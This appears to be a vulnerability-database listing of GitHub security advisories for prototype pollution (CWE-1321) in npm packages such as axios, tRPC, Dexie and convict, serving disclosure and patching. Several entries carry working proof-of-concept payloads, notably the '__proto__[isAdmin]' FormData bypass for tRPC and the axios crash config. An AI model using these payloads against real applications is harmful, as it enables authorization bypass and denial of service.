CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
779 vulnerabilities reference this CWE, most recent first.
GHSA-3WCJ-GJVF-FVCH
Vulnerability from github – Published: 2026-07-11 15:30 – Updated: 2026-07-11 15:30Hono before 4.12.7 allows proto key in parseBody with dot option enabled, permitting specially crafted form field names to create objects with proto properties. When parsed results are merged into regular JavaScript objects using unsafe merge patterns, attackers can exploit this to achieve prototype pollution and modify object behavior.
{
"affected": [],
"aliases": [
"CVE-2026-56763"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-11T14:16:22Z",
"severity": "MODERATE"
},
"details": "Hono before 4.12.7 allows __proto__ key in parseBody with dot option enabled, permitting specially crafted form field names to create objects with __proto__ properties. When parsed results are merged into regular JavaScript objects using unsafe merge patterns, attackers can exploit this to achieve prototype pollution and modify object behavior.",
"id": "GHSA-3wcj-gjvf-fvch",
"modified": "2026-07-11T15:30:23Z",
"published": "2026-07-11T15:30:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/honojs/hono/security/advisories/GHSA-v8w9-8mx6-g223"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56763"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/hono-prototype-pollution-via-proto-key-in-parsebody-with-dot-option"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3X3F-JCP3-G22J
Vulnerability from github – Published: 2024-09-17 21:29 – Updated: 2024-11-18 16:27Impact
A malicious actor with authenticated access to a Backstage instance with the catalog backend plugin installed is able to interrupt the service using a specially crafted query to the catalog API.
Patches
This has been fixed in the 1.26.0 release of the @backstage/plugin-catalog-backend package.
References
If you have any questions or comments about this advisory:
Open an issue in the Backstage repository Visit our Discord, linked to in Backstage README
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@backstage/plugin-catalog-backend"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.26.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45815"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-17T21:29:49Z",
"nvd_published_at": "2024-09-17T21:15:12Z",
"severity": "HIGH"
},
"details": "### Impact\n\nA malicious actor with authenticated access to a Backstage instance with the catalog backend plugin installed is able to interrupt the service using a specially crafted query to the catalog API.\n\n### Patches\n\nThis has been fixed in the `1.26.0` release of the `@backstage/plugin-catalog-backend` package.\n\n### References\n\nIf you have any questions or comments about this advisory:\n\nOpen an issue in the [Backstage repository](https://github.com/backstage/backstage)\nVisit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)\n",
"id": "GHSA-3x3f-jcp3-g22j",
"modified": "2024-11-18T16:27:13Z",
"published": "2024-09-17T21:29:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-3x3f-jcp3-g22j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45815"
},
{
"type": "PACKAGE",
"url": "https://github.com/backstage/backstage"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@backstage/plugin-catalog-backend Prototype Pollution vulnerability"
}
GHSA-3XGX-R9J4-QW9W
Vulnerability from github – Published: 2022-05-03 00:00 – Updated: 2022-05-23 20:12Dexie is a minimalistic wrapper for IndexedDB. The package dexie before 3.2.2, from 4.0.0-alpha.1 and before 4.0.0-alpha.3 are vulnerable to Prototype Pollution in the Dexie.setByKeyPath(obj, keyPath, value) function which does not properly check the keys being set (like proto or constructor). This can allow an attacker to add/modify properties of the Object.prototype leading to prototype pollution vulnerability. Note: This vulnerability can occur in multiple ways, for example when modifying a collection with untrusted user input.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "dexie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.0.0-alpha.2"
},
"package": {
"ecosystem": "npm",
"name": "dexie"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-alpha.1"
},
{
"fixed": "4.0.0-alpha.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-21189"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-05-23T20:12:28Z",
"nvd_published_at": "2022-05-01T16:15:00Z",
"severity": "HIGH"
},
"details": "Dexie is a minimalistic wrapper for IndexedDB. The package dexie before 3.2.2, from 4.0.0-alpha.1 and before 4.0.0-alpha.3 are vulnerable to Prototype Pollution in the Dexie.setByKeyPath(obj, keyPath, value) function which does not properly check the keys being set (like __proto__ or constructor). This can allow an attacker to add/modify properties of the Object.prototype leading to prototype pollution vulnerability. **Note:** This vulnerability can occur in multiple ways, for example when modifying a collection with untrusted user input.",
"id": "GHSA-3xgx-r9j4-qw9w",
"modified": "2022-05-23T20:12:28Z",
"published": "2022-05-03T00:00:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21189"
},
{
"type": "WEB",
"url": "https://github.com/dexie/Dexie.js/commit/1d655a69b9f28c3af6fae10cf5c61df387dc689b"
},
{
"type": "PACKAGE",
"url": "https://github.com/dexie/Dexie.js"
},
{
"type": "WEB",
"url": "https://github.com/dexie/Dexie.js/blob/fe682ef24568278c3b31d9d6c93de095d4b77ae8/src/functions/utils.ts%23L134-L164"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2805308"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-DEXIE-2607042"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in Dexie"
}
GHSA-3XPH-CP8F-2229
Vulnerability from github – Published: 2021-12-10 20:31 – Updated: 2021-12-13 13:10utils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@fabiocaccamo/utils.js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.17.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-3815"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-09T18:05:12Z",
"nvd_published_at": "2021-12-08T17:15:00Z",
"severity": "HIGH"
},
"details": "utils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027).",
"id": "GHSA-3xph-cp8f-2229",
"modified": "2021-12-13T13:10:41Z",
"published": "2021-12-10T20:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3815"
},
{
"type": "WEB",
"url": "https://github.com/fabiocaccamo/utils.js/commit/102efafb291ce1916985514440d3bf8a6826890a"
},
{
"type": "PACKAGE",
"url": "https://github.com/fabiocaccamo/utils.js"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/20f48c63-f078-4173-bcac-a9f34885f2c0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in @fabiocaccamo/utils.js"
}
GHSA-4263-JGMP-7PF4
Vulnerability from github – Published: 2026-03-17 17:58 – Updated: 2026-03-19 21:12Impact
Remote clients can crash the Parse Server process by calling a cloud function endpoint with a crafted function name that traverses the JavaScript prototype chain of a registered cloud function handler, causing a stack overflow.
Patches
The fix restricts property lookups during cloud function name resolution to own properties only, preventing prototype chain traversal from stored function handlers.
Workarounds
There is no known workaround.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.6.0-alpha.24"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.6.47"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32886"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T17:58:08Z",
"nvd_published_at": "2026-03-18T22:16:25Z",
"severity": "HIGH"
},
"details": "### Impact\n\nRemote clients can crash the Parse Server process by calling a cloud function endpoint with a crafted function name that traverses the JavaScript prototype chain of a registered cloud function handler, causing a stack overflow.\n\n### Patches\n\nThe fix restricts property lookups during cloud function name resolution to own properties only, preventing prototype chain traversal from stored function handlers.\n\n### Workarounds\n\nThere is no known workaround.",
"id": "GHSA-4263-jgmp-7pf4",
"modified": "2026-03-19T21:12:40Z",
"published": "2026-03-17T17:58:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-4263-jgmp-7pf4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32886"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10210"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10211"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Parse Server\u0027s Cloud function dispatch crashes server via prototype chain traversal"
}
GHSA-42M6-G935-5VMQ
Vulnerability from github – Published: 2022-07-26 00:01 – Updated: 2022-08-11 22:04All versions of package @ianwalter/merge are vulnerable to Prototype Pollution via the main (merge) function. @ianwalter/merge is deprecated and the maintainer suggests using @generates/merger instead.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@ianwalter/merge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "9.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23397"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-26T19:37:36Z",
"nvd_published_at": "2022-07-25T14:15:00Z",
"severity": "MODERATE"
},
"details": "All versions of package @ianwalter/merge are vulnerable to Prototype Pollution via the main (`merge`) function. @ianwalter/merge is [deprecated](https://github.com/ianwalter/merge/blob/master/README.md) and the maintainer suggests using [@generates/merger](https://github.com/generates/generates/tree/main/packages/merger) instead.",
"id": "GHSA-42m6-g935-5vmq",
"modified": "2022-08-11T22:04:47Z",
"published": "2022-07-26T00:01:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23397"
},
{
"type": "PACKAGE",
"url": "https://github.com/ianwalter/merge"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-IANWALTERMERGE-1311022"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "@ianwalter/merge Prototype Pollution via `merge` function"
}
GHSA-43FC-JF86-J433
Vulnerability from github – Published: 2026-02-09 17:46 – Updated: 2026-05-08 13:46Denial of Service via proto Key in mergeConfig
Summary
The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
Details
The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:
utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
const merge = mergeMap[prop] || mergeDeepProperties;
const configValue = merge(config1[prop], config2[prop], prop);
(utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});
When prop is '__proto__':
JSON.parse('{"__proto__": {...}}')creates an object with__proto__as an own enumerable propertyObject.keys()includes'__proto__'in the iterationmergeMap['__proto__']performs prototype chain lookup, returningObject.prototype(truthy object)- The expression
mergeMap[prop] || mergeDeepPropertiesevaluates toObject.prototype Object.prototype(...)throwsTypeError: merge is not a function
The mergeConfig function is called by:
Axios._request()atlib/core/Axios.js:75Axios.getUri()atlib/core/Axios.js:201- All HTTP method shortcuts (
get,post, etc.) atlib/core/Axios.js:211,224
PoC
import axios from "axios";
const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);
Reproduction steps:
- Clone axios repository or
npm install axios - Create file
poc.mjswith the code above - Run:
node poc.mjs - Observe the TypeError crash
Verified output (axios 1.13.4):
TypeError: merge is not a function
at computeConfigValue (lib/core/mergeConfig.js:100:25)
at Object.forEach (lib/utils.js:280:10)
at mergeConfig (lib/core/mergeConfig.js:98:9)
Control tests performed:
| Test | Config | Result |
|------|--------|--------|
| Normal config | {"timeout": 5000} | SUCCESS |
| Malicious config | JSON.parse('{"__proto__": {"x": 1}}') | CRASH |
| Nested object | {"headers": {"X-Test": "value"}} | SUCCESS |
Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.
Impact
Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.
Affected environments:
- Node.js servers using axios for HTTP requests
- Any backend that passes parsed JSON to axios configuration
This is NOT prototype pollution - the application crashes before any assignment occurs.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.13.4"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.13.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.30.2"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25639"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-09T17:46:14Z",
"nvd_published_at": "2026-02-09T21:15:49Z",
"severity": "HIGH"
},
"details": "# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) \u0026\u0026 merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `\u0027__proto__\u0027`:\n\n1. `JSON.parse(\u0027{\"__proto__\": {...}}\u0027)` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `\u0027__proto__\u0027` in the iteration\n3. `mergeMap[\u0027__proto__\u0027]` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse(\u0027{\"__proto__\": {\"x\": 1}}\u0027);\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse(\u0027{\"__proto__\": {\"x\": 1}}\u0027)` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.",
"id": "GHSA-43fc-jf86-j433",
"modified": "2026-05-08T13:46:54Z",
"published": "2026-02-09T17:46:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7369"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7388"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v0.30.3"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig"
}
GHSA-43P4-M455-4F4J
Vulnerability from github – Published: 2025-12-16 19:37 – Updated: 2025-12-16 19:37Note that this vulnerability is only present when using
experimental_caller/experimental_nextAppDirCaller.
Summary
A Prototype Pollution vulnerability exists in @trpc/server's formDataToObject function, which is used by the Next.js App Router adapter. An attacker can pollute Object.prototype by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.
Affected Versions
- Package:
@trpc/server - Affected Versions: >=10.27.0
- Vulnerable Component:
formDataToObject()insrc/unstable-core-do-not-import/http/formDataToObject.ts
Vulnerability Details
Root Cause
The set() function in formDataToObject.ts recursively processes FormData field names containing bracket/dot notation (e.g., user[name], user.address.city) to create nested objects. However, it does not validate or sanitize dangerous keys like __proto__, constructor, or prototype.
Vulnerable Code
// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts
function set(obj, path, value) {
if (path.length > 1) {
const newPath = [...path];
const key = newPath.shift(); // ← No validation of dangerous keys
const nextKey = newPath[0];
if (!obj[key]) { // ← Accesses obj["__proto__"] which returns Object.prototype
obj[key] = isNumberString(nextKey) ? [] : {};
}
set(obj[key], newPath, value); // ← Recursively pollutes Object.prototype
return;
}
// ...
}
export function formDataToObject(formData) {
const obj = {};
for (const [key, value] of formData.entries()) {
const parts = key.split(/[\.\[\]]/).filter(Boolean); // Splits "__proto__[isAdmin]" → ["__proto__", "isAdmin"]
set(obj, parts, value);
}
return obj;
}
Attack Vector
When a user submits a form to a tRPC mutation using Next.js Server Actions, the nextAppDirCaller adapter processes the FormData:
// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89
if (normalizeFormData && input instanceof FormData) {
input = formDataToObject(input); // ← Vulnerable call
}
An attacker can craft FormData with malicious field names:
const formData = new FormData();
formData.append("__proto__[isAdmin]", "true");
formData.append("__proto__[role]", "superadmin");
When processed, this pollutes Object.prototype:
{}.isAdmin // → "true"
{}.role // → "superadmin"
Proof of Concept
# Step 1: Create the project directory
mkdir trpc-vuln-poc
cd trpc-vuln-poc
# Step 2: Initialize npm
npm init -y
# Step 3: Install vulnerable tRPC
npm install @trpc/server@11.7.2
# Step 4: Create the test file
Test.js
const { formDataToObject } = require('@trpc/server/unstable-core-do-not-import');
console.log("=== PoC Prototype Pollution en tRPC ===\n");
console.log("[1] Estado inicial:");
console.log(" {}.isAdmin =", {}.isAdmin);
const fd = new FormData();
fd.append("__proto__[isAdmin]", "true");
fd.append("__proto__[role]", "superadmin");
fd.append("username", "attacker");
console.log("\n[2] FormData malicioso:");
console.log(' __proto__[isAdmin] = "true"');
console.log(' __proto__[role] = "superadmin"');
console.log("\n[3] Llamando formDataToObject()...");
const result = formDataToObject(fd);
console.log(" Resultado:", JSON.stringify(result));
console.log("\n[4] Después del ataque:");
console.log(" {}.isAdmin =", {}.isAdmin);
console.log(" {}.role =", {}.role);
const user = { id: 1, name: "john" };
console.log("\n[5] Impacto en autorización:");
console.log(" Usuario normal:", JSON.stringify(user));
console.log(" user.isAdmin =", user.isAdmin);
if (user.isAdmin) {
console.log("\n VULNERABLE - Authorization bypass exitoso!");
} else {
console.log("\n ✓ Seguro");
}
Impact
Authorization Bypass (HIGH)
Many applications check user permissions using property access:
// Vulnerable pattern
if (user.isAdmin) {
// Grant admin access
}
After pollution, all objects will have isAdmin: "true", bypassing authorization.
Denial of Service (MEDIUM)
Polluting commonly used property names can crash applications:
formData.append("__proto__[toString]", "not_a_function");
// All subsequent .toString() calls will fail
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@trpc/server"
},
"ranges": [
{
"events": [
{
"introduced": "10.27.0"
},
{
"fixed": "10.45.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@trpc/server"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68130"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T19:37:57Z",
"nvd_published_at": "2025-12-16T17:16:11Z",
"severity": "HIGH"
},
"details": "\u003e Note that this vulnerability is only present when using `experimental_caller` / `experimental_nextAppDirCaller`.\n\n## Summary\n\nA Prototype Pollution vulnerability exists in `@trpc/server`\u0027s `formDataToObject` function, which is used by the Next.js App Router adapter. An attacker can pollute `Object.prototype` by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.\n\n## Affected Versions\n\n- **Package:** `@trpc/server`\n- **Affected Versions:** \u003e=10.27.0\n- **Vulnerable Component:** `formDataToObject()` in `src/unstable-core-do-not-import/http/formDataToObject.ts`\n\n## Vulnerability Details\n\n### Root Cause\n\nThe `set()` function in `formDataToObject.ts` recursively processes FormData field names containing bracket/dot notation (e.g., `user[name]`, `user.address.city`) to create nested objects. However, it does **not** validate or sanitize dangerous keys like `__proto__`, `constructor`, or `prototype`.\n\n### Vulnerable Code\n\n```typescript\n// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts\nfunction set(obj, path, value) {\n if (path.length \u003e 1) {\n const newPath = [...path];\n const key = newPath.shift(); // \u2190 No validation of dangerous keys\n const nextKey = newPath[0];\n\n if (!obj[key]) { // \u2190 Accesses obj[\"__proto__\"] which returns Object.prototype\n obj[key] = isNumberString(nextKey) ? [] : {};\n }\n \n set(obj[key], newPath, value); // \u2190 Recursively pollutes Object.prototype\n return;\n }\n // ...\n}\n\nexport function formDataToObject(formData) {\n const obj = {};\n for (const [key, value] of formData.entries()) {\n const parts = key.split(/[\\.\\[\\]]/).filter(Boolean); // Splits \"__proto__[isAdmin]\" \u2192 [\"__proto__\", \"isAdmin\"]\n set(obj, parts, value);\n }\n return obj;\n}\n```\n\n### Attack Vector\n\nWhen a user submits a form to a tRPC mutation using Next.js Server Actions, the `nextAppDirCaller` adapter processes the FormData:\n\n```typescript\n// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89\nif (normalizeFormData \u0026\u0026 input instanceof FormData) {\n input = formDataToObject(input); // \u2190 Vulnerable call\n}\n```\n\nAn attacker can craft FormData with malicious field names:\n\n```javascript\nconst formData = new FormData();\nformData.append(\"__proto__[isAdmin]\", \"true\");\nformData.append(\"__proto__[role]\", \"superadmin\");\n```\n\nWhen processed, this pollutes `Object.prototype`:\n\n```javascript\n{}.isAdmin // \u2192 \"true\"\n{}.role // \u2192 \"superadmin\"\n```\n\n## Proof of Concept\n\n```bash\n# Step 1: Create the project directory\n\nmkdir trpc-vuln-poc\ncd trpc-vuln-poc\n\n# Step 2: Initialize npm\n\nnpm init -y\n\n# Step 3: Install vulnerable tRPC\n\nnpm install @trpc/server@11.7.2\n\n# Step 4: Create the test file \n```\n---\n\n### Test.js\n\n```javascript\nconst { formDataToObject } = require(\u0027@trpc/server/unstable-core-do-not-import\u0027);\n\nconsole.log(\"=== PoC Prototype Pollution en tRPC ===\\n\");\n\nconsole.log(\"[1] Estado inicial:\");\nconsole.log(\" {}.isAdmin =\", {}.isAdmin);\n\nconst fd = new FormData();\nfd.append(\"__proto__[isAdmin]\", \"true\");\nfd.append(\"__proto__[role]\", \"superadmin\");\nfd.append(\"username\", \"attacker\");\n\nconsole.log(\"\\n[2] FormData malicioso:\");\nconsole.log(\u0027 __proto__[isAdmin] = \"true\"\u0027);\nconsole.log(\u0027 __proto__[role] = \"superadmin\"\u0027);\n\nconsole.log(\"\\n[3] Llamando formDataToObject()...\");\nconst result = formDataToObject(fd);\nconsole.log(\" Resultado:\", JSON.stringify(result));\n\nconsole.log(\"\\n[4] Despu\u00e9s del ataque:\");\nconsole.log(\" {}.isAdmin =\", {}.isAdmin);\nconsole.log(\" {}.role =\", {}.role);\n\nconst user = { id: 1, name: \"john\" };\nconsole.log(\"\\n[5] Impacto en autorizaci\u00f3n:\");\nconsole.log(\" Usuario normal:\", JSON.stringify(user));\nconsole.log(\" user.isAdmin =\", user.isAdmin);\n\nif (user.isAdmin) {\n console.log(\"\\n VULNERABLE - Authorization bypass exitoso!\");\n} else {\n console.log(\"\\n \u2713 Seguro\");\n}\n```\n\n## Impact\n\n### Authorization Bypass (HIGH)\n\nMany applications check user permissions using property access:\n\n```javascript\n// Vulnerable pattern\nif (user.isAdmin) {\n // Grant admin access\n}\n```\n\nAfter pollution, **all objects** will have `isAdmin: \"true\"`, bypassing authorization.\n\n### Denial of Service (MEDIUM)\n\nPolluting commonly used property names can crash applications:\n\n```javascript\nformData.append(\"__proto__[toString]\", \"not_a_function\");\n// All subsequent .toString() calls will fail\n```",
"id": "GHSA-43p4-m455-4f4j",
"modified": "2025-12-16T19:37:57Z",
"published": "2025-12-16T19:37:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/security/advisories/GHSA-43p4-m455-4f4j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68130"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/commit/78629d524968ef8db5a7adf68d8b95a44369d77e"
},
{
"type": "PACKAGE",
"url": "https://github.com/trpc/trpc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L",
"type": "CVSS_V4"
}
],
"summary": "tRPC has possible prototype pollution in `experimental_nextAppDirCaller`"
}
GHSA-44FC-8FM5-Q62H
Vulnerability from github – Published: 2026-03-26 18:55 – Updated: 2026-03-26 18:55Summary
A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.
Details
The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where startsWith() function is used to check whether user provided input contain forbidden strings.
PoC
Steps to reproduce
- Install latest version of convict using
npm installor cloning from git - Run the following code snippet:
String.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
